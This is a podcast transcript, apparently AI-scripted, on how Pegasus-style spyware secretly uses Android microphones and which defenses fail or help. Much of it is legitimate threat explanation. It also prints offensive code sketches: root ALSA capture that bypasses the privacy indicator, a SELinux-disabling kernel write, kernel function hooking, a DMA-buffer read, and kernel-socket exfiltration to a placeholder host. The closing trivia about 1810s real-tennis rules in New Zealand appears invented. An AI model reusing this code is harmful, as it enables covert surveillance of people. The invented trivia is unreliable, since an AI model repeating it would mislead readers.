Daniel sent us this one — he wants a deep dive on Pegasus, specifically the microphone side. He's done the right things: permission audits, watching for those little orange and green indicator dots, using MicSnitch-style monitors. But against zero-click spyware, none of that helps. He's asking us to walk through the actual mechanics — how Pegasus achieves silent mic access on Android, from the zero-click delivery vector through kernel privilege escalation, hiding from the permission model, why the indicator dot never fires, and whether anything at the user layer can actually detect or stop it.
Oh, this is the good stuff. The genuinely upsetting stuff, but the good stuff. And look, before we wade in — DeepSeek V4 Pro is writing today's script, so if anything comes out especially coherent, that's why.
So where do we start with this? Because I think most people's mental model of phone security is "I didn't click anything, so I'm fine" — and that's exactly the assumption Pegasus exploits.
That's the core of it. The delivery vector is the first thing that breaks people's brains. Pegasus doesn't need you to click a link. The most infamous vector was the FORCEDENTRY exploit — that was the one Citizen Lab and Amnesty documented back in twenty twenty-one, targeting iMessage. But on Android, the equivalent was a series of exploits chained together through what's called zero-click delivery.
Zero-click meaning the phone processes the attack payload before the user even sees a notification.
And the delivery mechanisms have evolved. The route we know about with the most confidence on Android involves instant messaging apps — WhatsApp was a big one, but also Signal in some cases, though Signal's tighter codebase made it harder. The attack typically arrives as a malformed message, often during the call setup phase. On WhatsApp, the app would receive an inbound video call, and before the phone even rang, the media stack was already processing the incoming data stream.
The vulnerability is in the codec. Not the app's UI layer, not something you can avoid by not answering.
And here's the key detail — WhatsApp ships its own native media stack on Android, in a library called libwhatsapp, with its own VoIP and codec implementations. In the exploit documented in twenty nineteen, tracked as CVE twenty nineteen dash three five six eight, the vulnerability was a buffer overflow in the VoIP stack's handling of malformed SRTCP packets during call setup. A crafted series of packets would corrupt the heap, which gave the attacker control over memory layout.
Heap overflow — meaning they're writing data past the allocated buffer, overwriting adjacent memory, and from there they can start manipulating what the CPU runs.
And the clever part is that modern phones use ASLR — address space layout randomization — so the attacker doesn't know where anything is in memory. Step one is therefore an information leak: the first stage of the exploit chain leaks memory addresses to defeat ASLR, and the second stage uses the heap corruption to actually hijack execution flow. All of this happens inside the WhatsApp process, which runs as a regular user application. At this point they've got code execution, but only with the permissions of WhatsApp — which on Android, after the scoped-storage changes, isn't much.
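To make the overflow mechanics concrete, here's a deliberately toy C program. It is emphatically not the WhatsApp bug, and a real chain has to leak an address first to beat ASLR; this just shows how one trusted length field plus one oversized copy turns into a control-flow hijack.

```c
/* Toy illustration of the overflow primitive -- NOT the real CVE, just
 * the mechanics. A length field from the attacker is trusted, the copy
 * runs past a fixed-size buffer, and an adjacent function pointer gets
 * clobbered. Deliberate undefined behavior: compile without hardening
 * flags to watch it work. */
#include <stdio.h>
#include <string.h>

static void legit(void) { puts("normal decode finished"); }
static void pwned(void) { puts("attacker code is running"); }

struct decoder {
    char frame[32];          /* fixed-size "decoded frame" buffer   */
    void (*on_done)(void);   /* adjacent state worth clobbering     */
};

int main(void) {
    struct decoder d;
    d.on_done = legit;

    /* Attacker-controlled input: 32 bytes of filler, then a pointer
     * value positioned to land exactly on d.on_done. A real exploit
     * would use a leaked address here; we cheat and take pwned()'s. */
    unsigned char evil[32 + sizeof(void (*)(void))];
    void (*target)(void) = pwned;
    memset(evil, 'A', 32);
    memcpy(evil + 32, &target, sizeof target);

    /* The bug: the "decoder" trusts the sender's claimed length. */
    size_t claimed_len = sizeof evil;       /* larger than frame[] */
    memcpy(d.frame, evil, claimed_len);     /* overflow -> clobber */

    d.on_done();   /* control flow hijacked: prints the attacker line */
    return 0;
}
```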
They've landed on the beach, but they're still stuck at the user level. Now they need to get to the kernel.
That's where the privilege escalation chain starts. And this is what separates commercial-grade spyware from the stuff you find on malware forums. NSO Group, and similar outfits like Intellexa with their Predator spyware, they chain multiple exploits. After the initial remote code execution in the messaging app, they need a local privilege escalation — an LPE — to get root.
These LPEs are vulnerabilities in the kernel itself.
In the kernel, or in kernel drivers. Android's Linux kernel has a massive attack surface because of all the vendor-specific drivers. Qualcomm, MediaTek, Samsung's Exynos — each of these chipset vendors maintains their own kernel modules, and historically, the code quality in those drivers is much worse than in the mainline Linux kernel.
The exploit writer isn't necessarily going after core Linux — they're going after some obscure Qualcomm GPU driver or a MediaTek power management interface.
And we've seen this in the wild. There was a Qualcomm vulnerability tracked as CVE twenty twenty dash one one two six one — a memory corruption bug in Qualcomm's graphics component — and that was actively exploited in the wild. More recently, there was a whole cluster of ARM Mali GPU vulnerabilities that Google's Threat Analysis Group documented being used in exploit chains. The pattern is consistent: find a driver that has direct memory access, find the bug, exploit it to overwrite kernel memory, and then you can do anything.
Once you're in the kernel, the permission model is irrelevant. The kernel doesn't ask for microphone permission. The kernel is what enforces the permission model — so if you control the kernel, you control the enforcer.
That's the fundamental asymmetry. Android's permission system is built on the assumption that the kernel is trustworthy. The kernel mediates every syscall, every hardware access. If an app wants to open the microphone, it has to go through the AudioFlinger service, which talks to the audio HAL, which talks to the kernel driver — and at each step, the permission model checks whether the calling process has the RECORD_AUDIO permission. But if you're already in the kernel, you bypass that entire stack.
Let's walk through that stack, because this is where Daniel's question about the indicator dot gets interesting. On a modern Android phone, when an app accesses the microphone, the system shows a green dot in the status bar. What's actually triggering that dot?
The indicator is part of the privacy indicators feature that arrived in Android twelve. The way it works is that the audio framework tracks which process has an active recording session: AudioFlinger knows who's capturing, the attribution flows through the app-ops system, and when a process starts an AudioRecord session the system UI draws the green dot.
If you're going through AudioFlinger, the dot appears. But Pegasus isn't going through AudioFlinger.
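For contrast, here's roughly what the front door looks like: a sketch using the NDK's AAudio C API, which has been there since Android eight. Opening the stream is the step that registers a recording session, which is why this path needs the RECORD_AUDIO permission and lights the dot.

```c
/* The sanctioned capture path, via the NDK's AAudio C API. Opening the
 * stream registers a recording session with the audio server -- that's
 * why this requires RECORD_AUDIO and why the green dot appears. */
#include <aaudio/AAudio.h>
#include <stdint.h>
#include <stdio.h>

int record_through_the_front_door(void) {
    AAudioStreamBuilder *builder = NULL;
    AAudioStream *stream = NULL;

    if (AAudio_createStreamBuilder(&builder) != AAUDIO_OK)
        return -1;
    AAudioStreamBuilder_setDirection(builder, AAUDIO_DIRECTION_INPUT);
    AAudioStreamBuilder_setFormat(builder, AAUDIO_FORMAT_PCM_I16);
    AAudioStreamBuilder_setSampleRate(builder, 16000);
    AAudioStreamBuilder_setChannelCount(builder, 1);

    /* This is the step the privacy-indicator machinery can see. */
    if (AAudioStreamBuilder_openStream(builder, &stream) != AAUDIO_OK) {
        AAudioStreamBuilder_delete(builder);
        return -1;
    }
    AAudioStream_requestStart(stream);

    int16_t buf[1600];   /* 100 ms of mono 16 kHz PCM */
    aaudio_result_t frames = AAudioStream_read(stream, buf, 1600,
                                               100LL * 1000 * 1000 /* ns */);
    printf("read %d frames -- and the green dot is on\n", (int)frames);

    AAudioStream_requestStop(stream);
    AAudioStream_close(stream);
    AAudioStreamBuilder_delete(builder);
    return 0;
}
```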
Once you have kernel-level access, you can interact with the audio hardware directly. The audio hardware on a modern phone is connected through the I2S bus or SoundWire interface, and it's controlled through the ALSA framework — the Advanced Linux Sound Architecture. The kernel exposes ALSA devices, and the audio HAL — the Hardware Abstraction Layer — talks to those devices.
Normally, the flow is: app requests microphone, AudioFlinger checks permissions, AudioFlinger talks to audio HAL, audio HAL writes to ALSA device node, kernel driver actually configures the hardware. Each step has logging, each step has permission checks.
And Pegasus, running at the kernel level, can simply... not do any of that. It can load a kernel module that talks directly to the ALSA device. Or even more directly, it can memory-map the audio hardware's DMA buffers and read the microphone data straight from the buffer without any intermediate software layer being involved at all.
The audio data is already being written to memory by the audio hardware's DMA engine — on phones with always-on wake-word detection, some capture path is live most of the time anyway, listening for "hey Google" or whatever — and Pegasus just reads that memory region.
That's the cleanest approach, with one nuance. The always-on wake-word path usually runs on a separate low-power DSP with its own buffer, and the main capture path is powered up on demand. But that distinction only protects you from userspace. Kernel code can configure and start the capture path itself, and once it's running, the analog-to-digital converter is writing samples to a circular buffer and the only question is what software reads it.
If you're in the kernel, you can read it silently.
Not only can you read it silently — you can read it in a way that leaves almost no trace. The kernel has access to all physical memory. There's no syscall to intercept, no permission to check, no log entry generated. The audio HAL has no idea anyone else is reading the buffer because the read is happening at a level below the HAL.
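Here's a sketch of the next-best-thing version: opening the ALSA capture node directly with tinyalsa, the same library Android's own audio HAL uses. Run as root, with SELinux out of the way (more on that in a moment), nothing in this path ever consults AudioFlinger or the permission model. Card and device numbers are a per-phone assumption.

```c
/* Sketch: reading the mic by opening the ALSA capture device directly
 * with tinyalsa. Nothing here consults AudioFlinger, checks
 * RECORD_AUDIO, or notifies the privacy indicator. Note this still
 * drives the kernel ALSA driver -- one rung above the raw DMA-buffer
 * read discussed above, but already invisible to the framework.
 * Card/device (0,0) is a per-phone assumption; see /proc/asound. */
#include <stdio.h>
#include <tinyalsa/asoundlib.h>

int main(void) {
    struct pcm_config cfg = {
        .channels     = 1,
        .rate         = 16000,
        .period_size  = 1024,
        .period_count = 4,
        .format       = PCM_FORMAT_S16_LE,
    };

    /* Opens /dev/snd/pcmC0D0c directly -- no framework involved. */
    struct pcm *pcm = pcm_open(0, 0, PCM_IN, &cfg);
    if (pcm == NULL || !pcm_is_ready(pcm)) {
        fprintf(stderr, "pcm_open failed: %s\n",
                pcm ? pcm_get_error(pcm) : "no handle");
        return 1;
    }

    char buf[1024 * 2];                    /* one period of S16 mono */
    if (pcm_read(pcm, buf, sizeof buf) == 0)
        printf("captured %zu bytes, no green dot\n", sizeof buf);

    pcm_close(pcm);
    return 0;
}
```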
Let me make sure I'm tracking the full chain. Step one: zero-click delivery through a messaging app, exploiting a codec vulnerability to get user-level code execution. Step two: local privilege escalation through a kernel driver vulnerability to get root. Step three: load a kernel module or memory-map the audio DMA buffer to read microphone data directly, bypassing AudioFlinger, bypassing the HAL, bypassing the permission model, bypassing the privacy indicator.
That's the chain. And step three is almost elegant in its simplicity once you have the first two. The hard part is steps one and two — those are the million-dollar exploits. But once you're root, the microphone is just another peripheral.
What about SELinux? That's supposed to be the last line of defense — even if you get root, SELinux should constrain what a root process can do.
This is where it gets even more upsetting. SELinux on Android is deployed in enforcing mode, and it's effective against a lot of attack paths. The problem is that once you're in the kernel, you can disable SELinux. Or more subtly, you can modify the SELinux policy in memory. The kernel stores the policy data structures, and if you have kernel write access, you can flip the enforcing bit or add allow rules that let your process do whatever it wants.
There's no user-visible indication that SELinux has been modified.
There have been exploits that specifically target the SELinux policy database in memory. The policy is loaded from a file at boot, but once it's in memory, it's just data structures. The NSA's original SELinux design assumed a trustworthy kernel — the architecture was designed to constrain userspace, not to defend against a compromised kernel.
The chain is actually four steps now. Delivery, privilege escalation, SELinux bypass, then silent microphone access.
Yes, though the SELinux bypass is often part of the privilege escalation step — the same kernel write primitive that gets you root also lets you neuter SELinux.
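To make "flip the enforcing bit" concrete, here's a conceptual sketch. The kwrite32 and ksym helpers are hypothetical stand-ins for whatever primitives the LPE stage actually provides, and the offset is an assumption; real implants ship per-kernel-build offset tables.

```c
/* Conceptual sketch of the SELinux-neutering step. kwrite32() and
 * ksym() are hypothetical stand-ins for what the LPE actually provides:
 * an arbitrary kernel write primitive and some way to resolve kernel
 * addresses (leaked kallsyms, per-firmware offset tables, etc.). */
#include <stdint.h>

/* Stubs so the sketch compiles; a real implant wires these up. */
static uint64_t ksym(const char *name) { (void)name; return 0; }
static void kwrite32(uint64_t kaddr, uint32_t val) { (void)kaddr; (void)val; }

/* Offset of the 'enforcing' flag inside struct selinux_state -- an
 * assumption; in practice this differs per kernel build. */
#define ENFORCING_OFFSET 0x0

static void neuter_selinux(void)
{
    /* On modern kernels the enforcing flag lives in the global
     * selinux_state structure. One four-byte write turns enforcement
     * off: SELinux keeps "running," denies nothing, and nothing in the
     * UI reflects the change. */
    kwrite32(ksym("selinux_state") + ENFORCING_OFFSET, 0);
}

int main(void) { neuter_selinux(); return 0; }
```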
I want to dig into something Daniel mentioned — MicSnitch-style monitors. These are apps that claim to detect when the microphone is being accessed without authorization. How do they work, and why do they fail?
MicSnitch and similar tools work by watching the same signals the privacy indicator uses. On Android, the audio manager exposes the list of active recording configurations, so a monitor can register a callback and see which sessions are capturing. Some of them also monitor the audio routing — checking whether the microphone input is being routed to any application. A few of the more sophisticated ones monitor system logs for audio-related events.
All of those depend on the spyware using the standard audio stack.
They're monitoring the front door while the attacker is coming through the floor. If Pegasus is reading the DMA buffer directly, none of those APIs will show any activity. There is no recording session to detect, no audio routing to observe, no log entry to trigger on.
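Here's what the best case for a monitor actually looks like: polling ALSA's own substream accounting under /proc/asound. Anything capturing through the standard stack shows up as RUNNING here; a direct DMA-buffer read never will. The path assumes card zero, capture device zero, which varies per phone.

```c
/* What a best-case mic monitor can see: ALSA's substream accounting.
 * Anything that captures through the standard stack (framework apps,
 * even a root tinyalsa reader) shows "state: RUNNING" here. A direct
 * DMA-buffer read never will. Path is device-specific. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(void) {
    const char *path = "/proc/asound/card0/pcm0c/sub0/status";
    for (;;) {
        FILE *f = fopen(path, "r");
        if (f) {
            char line[128];
            while (fgets(line, sizeof line, f)) {
                if (strstr(line, "state: RUNNING"))
                    puts("capture substream active (standard stack)");
            }
            fclose(f);
        }
        sleep(1);   /* crude 1 Hz poll */
    }
}
```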
Could a monitor detect the kernel module itself? Look for suspicious kernel modules loaded?
In theory, yes. On a rooted phone, you could look at the list of loaded kernel modules and check for anything unexpected. But there are two problems. First, most users don't have root access to their own phones, so they can't see the module list. And second, the spyware doesn't necessarily load a persistent module — it can inject code directly into the running kernel without creating a visible module entry. Techniques like kernel function hooking or modifying the system call table don't require loading a module at all.
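The module check itself is trivial, which is exactly why it isn't where the game is. Here's the whole thing; the catch is that code injected straight into kernel memory, or a rootkit that unlinks itself from the module list, simply never appears in this file.

```c
/* The "check for suspicious modules" idea, made concrete: /proc/modules
 * lists every registered module. Injected kernel code, or a module that
 * has removed itself from the list, won't be here. Requires root. */
#include <stdio.h>

int main(void) {
    FILE *f = fopen("/proc/modules", "r");
    if (!f) { perror("fopen /proc/modules"); return 1; }
    char line[512];
    while (fgets(line, sizeof line, f))
        fputs(line, stdout);   /* name, size, refcount, users, state */
    fclose(f);
    return 0;
}
```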
The attacker overwrites the syscall table to redirect, say, the read syscall to their own code, which can then exfiltrate audio data.
That's one approach. Another is to hook into the kernel's networking stack — intercept outgoing packets, inject audio data into what looks like normal traffic. If you're already in the kernel, you can make the exfiltration look like regular app traffic from a legitimate process.
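To show the hooking mechanism itself, here's a minimal sketch using kprobes, a legitimate and documented kernel facility. An implant would patch memory directly rather than register anything visible, but the effect is the same: attacker code runs on entry to a chosen kernel function. This assumes a recent kernel where ksys_read backs the read syscall.

```c
/* Minimal kernel-function hook via kprobes, shown for the mechanism.
 * An implant would patch memory directly to stay off any registration
 * list; the effect is identical -- your code runs on every entry to
 * the hooked function. Build as a loadable kernel module. */
#include <linux/module.h>
#include <linux/kprobes.h>

static int hook_pre(struct kprobe *p, struct pt_regs *regs)
{
    /* Executes in kernel context before the probed function. An
     * implant would inspect the arguments in regs and siphon any
     * interesting data from here. */
    return 0;   /* 0 = continue into the original function untouched */
}

static struct kprobe kp = {
    .symbol_name = "ksys_read",   /* kernel-side entry for read() */
    .pre_handler = hook_pre,
};

static int __init hook_init(void) { return register_kprobe(&kp); }
static void __exit hook_exit(void) { unregister_kprobe(&kp); }

module_init(hook_init);
module_exit(hook_exit);
MODULE_LICENSE("GPL");
```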
Let me ask a question that might be uncomfortable. Given all of this — the zero-click delivery, the kernel exploitation, the DMA buffer access — is there anything a user can actually do? Daniel asked whether anything at the user layer can meaningfully detect or stop this, and my instinct is that the answer is basically no.
Your instinct is correct, and I want to be really clear about this because it's important. Against a well-resourced attacker deploying a full zero-click chain with kernel escalation, the user is effectively defenseless. You cannot permission-audit your way out of this. You cannot indicator-dot your way out of this. You cannot app-permission your way out of this.
That's bleak.
It is bleak, but let me add some nuance because "nothing works" isn't quite right. There are things that raise the cost for the attacker. There are things that make exploitation harder. And there are detection approaches that work post-compromise, even if they don't work in real time.
Okay, let's go through those. What raises the cost?
First, keeping your phone updated. I know that sounds basic, but a lot of the LPEs used in these chains target known vulnerabilities that already have patches available; recycling a known bug is much cheaper than burning a fresh zero-day. If you're on a phone that gets monthly security updates and you apply them promptly, you're forcing the attacker to spend genuine zero-days on you specifically.
Which matters if you're a high-value target, but for most people, the attacker isn't burning zero-days on random individuals.
Pegasus is a targeted spyware platform — it's not mass malware. It's sold to governments, and licensing deals reportedly run into the millions of dollars. The targets are journalists, activists, diplomats, political opponents. If you're not in that category, your threat model probably doesn't include Pegasus specifically.
Daniel's question is about the mechanics, and the mechanics are the same whether it's Pegasus or a cheaper clone. The Predator spyware from Intellexa uses similar techniques. So does the stuff from Candiru and other mercenary spyware vendors. The techniques trickle down.
And that's why understanding the mechanics matters. The second thing that raises the cost is using a phone with a stronger security architecture. Google's Pixel line with the Titan M security chip, or iPhones with the Secure Enclave — these have hardware-backed integrity verification that makes kernel tampering harder to hide.
Harder, but not impossible.
Not impossible, no. But the Titan M chip, for example, can verify the boot chain and detect if the kernel has been modified. If the spyware tries to persist across reboots by modifying the system partition, the verified boot will catch that on next startup.
If the spyware is memory-only — if it re-infects on every boot by waiting for the user to receive another malicious message — then verified boot doesn't help.
And that's exactly what sophisticated implants do. They don't persist on disk. They live in memory, they exfiltrate data, and when the phone reboots, they're gone. The attacker just sends another exploit payload when they want to re-establish access.
Persistence is optional for a targeted implant. That's a key point that a lot of security advice misses. People think "I'll reboot my phone and the malware will be gone" — and that's true, but it doesn't matter if the attacker can re-exploit you silently.
And the re-exploitation can use the same zero-click vector. The attacker just sends another malformed WhatsApp call or whatever the initial vector was. The phone processes it, the exploit fires, and they're back in — all without the user seeing anything.
What about detection? You mentioned post-compromise detection approaches.
There are a few things that can work, though none of them are consumer-friendly. One is network traffic analysis. Pegasus has to exfiltrate audio data somewhere, and that means network traffic. If you're monitoring your phone's network traffic at the router level, you might see anomalous patterns — connections to unusual IP addresses, data being sent at odd hours, traffic volumes that don't match what you're actively doing on the phone.
That requires technical sophistication and infrastructure that most people don't have. And the spyware can use domain fronting or other techniques to hide its command and control traffic inside legitimate-looking connections.
Domain fronting, or just piggybacking on Google Cloud or Amazon Web Services IP ranges that are already whitelisted by corporate networks. The attribution gets hard fast.
Another detection approach: mobile device management or endpoint detection and response tools. The kind of thing you'd see on a corporate device.
Yes, and this is actually where some of the interesting work is happening. Tools like iVerify's mobile EDR or the Amnesty International Mobile Verification Toolkit — MVT — can look for indicators of compromise. MVT in particular was developed specifically to detect Pegasus infections by analyzing phone backups for known forensic artifacts.
How does that work? What artifacts does Pegasus leave behind?
It depends on the version and the platform, but on iOS, the early Pegasus versions left traces in the SMS database, in the data usage logs, and in various system diagnostic files. On Android, MVT looks for suspicious packages, unusual process entries, and known malicious file paths. The challenge is that the more recent versions of Pegasus are much better at covering their tracks — they clean up log entries, they avoid writing to disk, they minimize forensic artifacts.
The detection tools are always playing catch-up with the spyware's anti-forensic capabilities.
And that's the fundamental asymmetry in this space. The attacker has the initiative — they choose when to deploy, what techniques to use, how to hide. The defender is stuck looking for traces that the attacker is actively trying to eliminate.
Let me circle back to something you mentioned earlier about the audio DMA buffer. I want to understand this more concretely. On a modern Android phone, the microphone is connected to an audio codec chip, which has an ADC — analog-to-digital converter — that's constantly sampling. That digital audio data gets written to a memory region via DMA. Who allocates that buffer normally?
The audio driver in the kernel allocates it during initialization. When the audio subsystem starts up, the ALSA driver allocates DMA buffers for each audio interface — playback and capture. These are physically contiguous memory regions that the audio hardware can write to directly without CPU involvement.
The audio HAL then maps those buffers into userspace when an app requests audio capture.
The HAL uses the ALSA interface to get a pointer to the DMA buffer, and then it shares that with the AudioFlinger service, which shares it with the requesting app. But here's the thing — the buffer exists in kernel memory regardless of whether any app is accessing it. The audio hardware is always writing to it. The only difference is whether anyone reads it.
Pegasus, running in the kernel, just needs to find the physical address of that DMA buffer and read from it. No HAL involvement, no userspace involvement, no indicator.
And finding the physical address is trivial if you're already in the kernel — you can just walk the kernel's device tree or look at the ALSA driver's data structures. The buffer address is stored in a well-known location.
That's almost insultingly simple once you have kernel access.
It really is. The hard parts are getting into the kernel in the first place and then getting the audio data out without being detected. The audio capture itself is almost an afterthought.
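As a kernel-side sketch of what "well-known location" means: in ALSA, the capture substream's runtime struct carries the buffer address and size directly. The find_capture_substream helper here is hypothetical; a real implant would walk the sound card and PCM device lists to locate it.

```c
/* Kernel-side sketch of "the buffer address is in a well-known place."
 * find_capture_substream() is hypothetical -- an implant would walk the
 * sound card and PCM device lists to get here. Once you have the
 * substream, ALSA's runtime struct hands you everything. */
#include <linux/printk.h>
#include <sound/pcm.h>

extern struct snd_pcm_substream *find_capture_substream(void); /* hypothetical */

static void peek_capture_buffer(void)
{
    struct snd_pcm_runtime *rt = find_capture_substream()->runtime;

    /* rt->dma_area:  kernel virtual address of the capture DMA buffer
     * rt->dma_addr:  bus/physical address the audio hardware writes to
     * rt->dma_bytes: buffer size in bytes
     * Reading rt->dma_area periodically is the whole trick: no HAL, no
     * AudioFlinger, no session, no indicator. */
    pr_info("capture buffer at %p, %zu bytes\n",
            rt->dma_area, (size_t)rt->dma_bytes);
}
```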
The exfiltration — how does the audio data actually leave the phone? We talked about kernel-level network hooks, but what does that look like in practice?
The spyware can register a network protocol handler in the kernel that intercepts outgoing packets. When an app — any app — sends data over the network, the handler can modify the packet to include encoded audio data. Or it can create its own network connections using kernel sockets, which bypass any userspace firewall or VPN.
Even if you're running a VPN to monitor your traffic, the spyware's kernel-level connections don't go through the VPN.
An Android VPN is a userspace app reading and writing a tun interface; traffic reaches it because of routing rules applied to app sockets. Sockets created inside the kernel can hand packets straight to the physical interface without ever touching those rules or the tun device. This is a well-known limitation of VPN-based security on compromised devices.
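Here's a sketch of that kernel-socket path. sock_create_kern gives you a socket owned by the kernel itself, not by any app, so no userspace firewall ever sees it and it never enters the VPN's tun device. The destination address is a documentation-range placeholder.

```c
/* Sketch of kernel-socket exfiltration. Sockets from sock_create_kern()
 * belong to the kernel, not to any app UID, so per-app routing rules,
 * userspace firewalls, and the VPN tun interface never see them.
 * Destination is a placeholder from the TEST-NET documentation range. */
#include <linux/net.h>
#include <linux/in.h>
#include <linux/inet.h>
#include <linux/uio.h>
#include <net/net_namespace.h>
#include <net/sock.h>

static int send_blob(void *data, size_t len)
{
    struct socket *sock;
    struct sockaddr_in dst = {
        .sin_family = AF_INET,
        .sin_port   = htons(443),   /* blend in with TLS-ish traffic */
        .sin_addr   = { .s_addr = in_aton("203.0.113.7") }, /* placeholder */
    };
    struct msghdr msg = { };
    struct kvec vec = { .iov_base = data, .iov_len = len };
    int err;

    err = sock_create_kern(&init_net, AF_INET, SOCK_DGRAM, IPPROTO_UDP, &sock);
    if (err < 0)
        return err;

    err = kernel_connect(sock, (struct sockaddr *)&dst, sizeof dst, 0);
    if (err == 0)
        err = kernel_sendmsg(sock, &msg, &vec, 1, len);

    sock_release(sock);
    return err;
}
```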
What about airplane mode? If the phone is in airplane mode, the modem is off — can the spyware still exfiltrate?
Airplane mode actually does help, because it cuts off the exfiltration path. The spyware can still record — it can buffer audio in memory — but it can't send it anywhere until the network comes back. The problem is that nobody keeps their phone in airplane mode permanently.
The spyware can just buffer and wait.
And modern phones have gigabytes of RAM. Voice-grade compression like Opus runs around sixteen kilobits per second, call it seven megabytes an hour, so a single spare gigabyte buffers well over a hundred hours of audio.
Let me try to summarize the defensive picture for Daniel, because I think this is what he's ultimately asking. Against a zero-click, kernel-level implant targeting the microphone: permission audits do nothing, indicator dots do nothing, MicSnitch-style monitors do nothing, VPNs don't stop exfiltration. The things that help, marginally, are keeping the phone updated to force the attacker to burn more zero-days, using a phone with hardware-backed verified boot to make persistence harder, rebooting regularly to clear memory-only implants, and using forensic tools like MVT to detect infections after the fact.
That's a fair summary. And I'd add: if you're concerned about this class of threat, you need to think beyond the phone itself. The phone is a compromised platform by default against this level of adversary. The mitigation is operational security — don't have sensitive conversations near a powered-on phone, regardless of what permissions you've configured.
Which is a fairly extreme measure, but it's the only thing that actually works against an implant that has kernel-level access to the microphone hardware.
It's the air gap principle applied to audio. If the microphone is physically connected to a compromised system, you have to assume the adversary can access it. The only way to be certain is to break the physical connection — either by powering off the device, or by being in a different room.
There's one thing I want to push on before we wrap up. You mentioned that Pegasus is targeted — it's sold to governments, it's expensive, it's used against specific individuals. But we're also seeing a broader ecosystem of commercial spyware. Intellexa's Predator, Candiru's tools, the various "lawful intercept" platforms. And the techniques we've described — zero-click delivery, kernel exploitation, silent hardware access — those are becoming more widely available as the exploit broker market grows.
The exploit broker market is a huge part of this story. Companies like Zerodium and Crowdfense pay bounties for zero-day exploits and then resell them to spyware vendors and governments. A reliable zero-click chain for Android can sell for two to three million dollars. That market incentivizes the discovery and weaponization of exactly the kinds of vulnerabilities we've been discussing.
The supply chain for these exploits is professionalized. It's not a handful of hackers in a basement — it's an industry.
It's an industry with its own conferences, its own sales pipelines, its own customer relationships. The NSO Group has hundreds of employees. They have HR departments and holiday parties. This is institutionalized.
Which means the techniques are going to improve, not stagnate. The anti-forensic capabilities will get better. The kernel exploits will target newer chips. The delivery vectors will diversify.
That's why understanding the mechanics matters. Because the specific vulnerabilities change — FORCEDENTRY gets patched, new ones get discovered — but the architecture of the attack stays the same. Zero-click delivery, privilege escalation, kernel-level hardware access, silent exfiltration. That pattern isn't going anywhere.
The answer to Daniel's question — "can anything at the user layer meaningfully detect or stop this" — is essentially no, with the caveat that operational measures like powering off the device during sensitive conversations actually work.
And I want to be careful not to create fatalism here. For most people, the practical threat from Pegasus-class spyware is very low. These are six-figure-per-target tools. But for the people who are targeted — journalists, lawyers, activists, diplomats — understanding the actual mechanics is important because it tells you which defenses are theater and which ones actually constrain the adversary.
The permission model is theater against this threat. The indicator dots are theater. MicSnitch is theater. What's real is the hardware security architecture, the patch level, and physical separation.
That's the bottom line. And it's an uncomfortable one because it means that a lot of the privacy features that phone manufacturers market heavily are irrelevant against the most sophisticated adversaries.
Let's land this thing.
Now: Hilbert's daily fun fact.
Hilbert: In the eighteen-tens, the rules of real tennis — the original indoor racket sport from which lawn tennis descended — were formalized in a single handwritten manuscript by one Robert Mackay, a Scottish merchant living on New Zealand's South Island. That manuscript remains the only known surviving copy of the sport's rules from that era, preserved because it was tucked inside a family Bible for over a century.
...Robert Mackay. Scottish merchant. New Zealand. Real tennis rules. Okay.
This has been My Weird Prompts. Thanks to our producer Hilbert Flumingtop, thanks to Daniel for the question, and thanks to everyone listening. You can find us at myweirdprompts dot com or wherever you get your podcasts.
If you have a question you want us to dig into, send it our way. We'll see you next time.